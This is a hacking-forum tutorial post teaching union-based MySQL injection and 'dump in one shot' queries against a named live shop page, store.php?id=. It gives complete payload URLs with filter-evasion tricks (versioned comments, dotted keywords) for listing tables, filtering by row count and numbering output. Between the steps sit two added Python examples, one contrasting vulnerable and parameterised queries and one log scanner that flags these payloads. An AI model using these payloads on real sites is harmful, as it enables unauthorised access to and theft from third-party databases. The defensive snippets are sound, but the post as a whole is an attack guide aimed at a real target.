hello coinorder members

today i am just going to share something new that i learned from here (hf, of course).

actually, nowadays i am working on janus' advanced challenges and learning something new every day with them. i am also learning new things from master benzi and brother janus.
so, let's try.


target:
php code:

http://teamgear.us/store.php?id=1





let's start with our normal injection.
[screenshots of the output not preserved]
this means there are 15 columns in total. so, now let's try our union select query.

php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -



so, columns ==> 8 :: 5 :: 3 (2) are the vulnerable ones (their values are reflected on the page). cheerz.
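The reason any of this works is that store.php pastes the id parameter straight into its SQL text. As an added example (not code from this post or from the site it targets), here is that lookup written the vulnerable way next to a hardened version, using an in-memory sqlite3 database as a stand-in for the MySQL backend; the tables, rows and request values are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the shop database (sqlite3 in memory instead of MySQL;
# the string-concatenation mistake behaves the same way). Rows are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "jersey", 29.99), (2, "cap", 12.5)])
    # a second table standing in for data the product query was never meant to reach
    conn.execute("CREATE TABLE users (id INTEGER, login TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'hash-placeholder')")
    return conn


def lookup_vulnerable(conn, raw_id):
    # The store.php?id= pattern from the post: the request parameter is pasted
    # into the SQL text, so "id" can carry a whole second query.
    sql = "SELECT id, name, price FROM products WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    # 1) enforce the type the application expects; anything else is rejected
    #    before it gets near the database (and is worth logging)
    try:
        product_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    # 2) bind the value as a parameter: it is sent as data, never parsed as SQL
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return conn.execute(sql, (product_id,)).fetchall()


# Constructed request value shaped like the post's union trick (a non-matching
# id followed by a union that pulls rows from another table).
UNION_PAYLOAD = ".1 union all select id, login, pw_hash from users"


def demo():
    conn = make_db()
    report = {
        "normal_vulnerable": lookup_vulnerable(conn, "1"),
        "normal_hardened": lookup_hardened(conn, "1"),
        "payload_vulnerable": lookup_vulnerable(conn, UNION_PAYLOAD),
    }
    try:
        lookup_hardened(conn, UNION_PAYLOAD)
        report["payload_hardened"] = "accepted"
    except ValueError as exc:
        report["payload_hardened"] = f"rejected: {exc}"
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The int() check is not the defence on its own; the parameter binding is. The type check only rejects garbage early with a clean error you can log, and an application whose ids are strings would skip it and rely on the placeholder alone.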


now let's start playing with our dios and its output.

step 1

let's try to display all the tables from the primary (current) database.

php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (s.elect (0) f.rom (i.nformation_s.chema.tables)
w.here (t.able_schema=d.atabase()) a.nd (0x00) in (@x:=c.oncat(@x,0x3c62723e,t.able_name))))x),9,10,11,12,13,14,15-- -



ps: just remove the full stops in the unwanted places, e.g. s.elect => select

so, as you can see, there are 5 tables in the primary database.


step 2

let's try to add some conditions to our query; for example, in challenges we sometimes have to print only the tables that have more than 30 records, etc.

so, we can use the if() function. (you can check master benzi's tutorial on this, or zhen's bookmarks.)
quote:
if(some_condition, return_if_some_condition_is_true, return_if_some_condition_is_false)


so, now our query will look something like this=>
php code:

if(table_rows>30,concat/**_**/(0x3c62723e,table_name,table_rows),0x00)




so, what it will do now is only show you those tables whose record count is more than 30.

php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (s.elect (0) f.rom (i.nformation_schema.tables)
w.here (t.able_schema=d.atabase/**_**/()) a.nd (0x00) i.n (@x:=c.oncat(@x,
if(
table_rows>30, concat/**_**/(0x3c62723e3a3a, t.able_name,0x3a3a, table_rows), 0x00)
))))
x),9,10,11,12,13,14,15-- -




so, here is the output=>


so it's now showing us all the tables with more than 30 records, and after the :: separator (0x3a3a in hex) it shows us the record count of each one.

step 3
so, now let's try to display a running number next to each t.able_name

so, we will add a new user variable, running_number, to our query.


php code:

(@running_number:=@running_number%2b1)




%2b is the url-encoded + sign; we are adding 1 to our variable running_number for every row.

so, now our query will be like=>
php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (@running_number:=0),(s.elect (0) f.rom (i.nformation_schema.tables) w.here (t.able_schema=database/**_**/()) and (0x00) in (@x:=c.oncat(@x,0x3c62723e,(@running_number:=@running_number%2b1),0x2e20,t.able_name))))x),9,10,11,12,13,14,15-- -





remove the unwanted full stops.

result=>


so, now we will use the lpad function to display every number with the same width of 3 digits.

like
php code:

001.
002.
003.




so, now we will use
quote:
lpad(str, len, padstr) which will return the string str, left-padded with the string padstr to a length of len characters.

so, our len will be 3 (because we need to display numbers with length 3, but you can use 4, 5, etc. according to your need).

so, now our query will be something like
php code:

lpad(@running_number:=@running_number%2b1,3,0x30)



ps: here %2b is +.

so, now our query will be

code:

http://teamgear.us/store.php?id=.1+/...5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (@running_number:=0),(s.elect (0) f.rom (i.nformation_schema.tables) w.here (t.able_schema=database/**_**/()) and (0x00) in (@x:=c.oncat(@x,0x3c62723e,lpad(@running_number:=@running_number%2b1,3,0),0x2e20,t.able_name))))x),9,10,11,12,13,14,15-- -
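For whoever is watching the web server logs on the other side of requests like the ones in steps 1 to 3, every obfuscation trick used here (versioned comments such as /*!50000union*/, inline comments such as /**_**/, url-encoded +, user variable assignments such as @x:=) survives a simple normalisation of the query string. Below is an added example, not part of the original post, of a small Python scanner that decodes and de-comments each request in an access log and flags the dios indicators; the log lines, addresses and paths are constructed, and the thresholds are my own choice.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (addresses and paths are made up).
# Line 2 has the shape of a column-count probe, line 3 the shape of the DIOS
# request in the post (shortened, with the same obfuscation tricks), line 4 is a
# benign search that merely contains the word "union".
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /store.php?id=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /store.php?id=1+order+by+15-- HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /store.php?id=.1+/*!50000union*/+all+select+1,2,3,concat(@x:=0x00,0x3c62723e,table_name),5+from+information_schema.tables+where+table_schema=database/**_**/()--+- HTTP/1.1" 200 6234
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /search.php?q=credit+union+rates HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Indicator names and the patterns matched against the normalised query string.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "user_variable_assign": re.compile(r"@\w+\s*:="),    # @x:= / @running_number:=
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),    # 0x3c62723e, 0x3a3a, ...
    "order_by_probe": re.compile(r"\border by \d+"),
    "comment_terminator": re.compile(r"--\s*-?\s*$|#\s*$"),  # "-- -", "--" or "#"
}


def normalize_query(request_path):
    """Return the query string decoded, lower-cased and with MySQL comments removed."""
    query = request_path.partition("?")[2]
    text = unquote_plus(query).lower()          # '+' -> ' ', '%2b' -> '+'
    # /*!50000union*/ is executed by MySQL as "union": keep the inner text
    text = re.sub(r"/\*!\d{5}(.*?)\*/", r"\1", text, flags=re.S)
    # plain inline comments such as /**_**/ are ignored by MySQL: drop them
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip()


def score_request(request_path):
    """Sorted list of indicator names that fire on one request path."""
    query = normalize_query(request_path)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(query))


def is_suspicious(hits):
    # a union...select on its own is enough; otherwise require two indicators
    # so that a lone "--" or a lone hex value does not page anyone
    return "union_select" in hits or len(hits) >= 2


def scan_log(text):
    """Return (client, path, hits) for every flagged request in an access log."""
    flagged = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, path = m.group(1), m.group(2)
        hits = score_request(path)
        if is_suspicious(hits):
            flagged.append((client, path, hits))
    return flagged


if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(client, hits, path[:60])
```

Two of the four constructed lines get flagged: the order by probe (two indicators) and the dios request (union plus four others), while the plain product lookup and the "credit union" search pass. The normalisation step is the part worth keeping; the indicator list is a starting point to extend with whatever your own application never legitimately sends.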



hope this will be useful for the new members here.

quote:
special thanks to master benzi, janus, hooded robin, darkjin, codeninja, th3_uniqu3, bd_injector and of course my best friend krankenstein

please comment